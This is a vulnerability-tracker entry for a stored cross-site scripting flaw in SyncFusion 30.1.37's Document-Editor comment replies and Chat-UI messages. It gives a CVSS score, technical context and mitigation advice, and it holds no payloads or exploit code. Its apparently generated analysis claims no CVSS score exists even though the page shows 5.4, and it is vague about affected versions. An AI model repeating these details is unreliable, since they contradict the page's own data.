EUVD-2025-208909

| CVE-2025-63260 MEDIUM
2026-03-20 mitre
5.4
CVSS 3.1
Share

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 20, 2026 - 20:00 vuln.today
EUVD ID Assigned
Mar 20, 2026 - 20:00 euvd
EUVD-2025-208909
CVE Published
Mar 20, 2026 - 00:00 nvd
MEDIUM 5.4

Tags

XSS

Description

SyncFusion 30.1.37 is vulnerable to Cross Site Scripting (XSS) via the Document-Editor reply to comment field and Chat-UI Chat message.

Analysis

SyncFusion versions up to 30.1.37 contain stored Cross-Site Scripting (XSS) vulnerabilities in two distinct UI components: the Document-Editor reply-to-comment field and the Chat-UI chat message field. An attacker can inject malicious JavaScript payloads through these fields, which are then stored and executed in the browsers of other users who view the affected content, potentially enabling session hijacking, credential theft, or malware distribution. No CVSS score, EPSS data, or KEV status is currently available, but proof-of-concept exploitation details are documented in the pentest-tools reference (PTT-2025-023-Multiple-Stored-XSS.pdf).

Technical Context

The vulnerability stems from improper input validation and output encoding in SyncFusion's rich-text UI components. The Document-Editor and Chat-UI modules fail to sanitize user-supplied input before storing it in application state or databases, and subsequently fail to HTML-encode or use Content Security Policy (CSP) when rendering this content back to users. This is a classic stored XSS flaw (CWE-79: Improper Neutralization of Input During Web Page Generation) where the attack vector traverses the application's data persistence layer rather than being reflected immediately. The affected CPE references indicate the vulnerability spans SyncFusion's web component library across potentially multiple versions and platforms, though exact version granularity is not fully specified in available metadata.

Affected Products

SyncFusion version 30.1.37 and likely earlier versions are confirmed affected. The vulnerability impacts SyncFusion's Document-Editor component (reply-to-comment feature) and Chat-UI component (chat message field). The CPE reference (cpe:2.3:a:n/a:n/a:*:*:*:*:*:*:*:*) is incomplete and does not specify the exact product name or version range; however, vendor contact information is available at http://syncfusion.com. Further clarification on affected version ranges (pre-30.1.37, or only 30.1.37 specifically) should be obtained directly from SyncFusion security advisories.

Remediation

Immediately check SyncFusion's security advisory portal at http://syncfusion.com for available patches and upgrade Document-Editor and Chat-UI components to the latest patched version when released. Until patches are available, implement the following mitigations: enforce strict Content Security Policy (CSP) headers to block inline script execution; apply server-side input validation and HTML entity encoding on all comment and chat message fields before storage; use a library like DOMPurify or OWASP ESAPI to sanitize rendered HTML; implement rate limiting on comment and chat submissions to reduce attack surface; and consider disabling rich-text formatting temporarily if plain text suffices. Review access logs for evidence of XSS payload injection attempts. Consult the pentest-tools proof-of-concept document (https://pentest-tools.com/PTT-2025-023-Multiple-Stored-XSS.pdf) for specific payload patterns to monitor and block.

Priority Score

27
Low Medium High Critical
KEV: 0
EPSS: +0.0
CVSS: +27
POC: 0

Share

EUVD-2025-208909 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy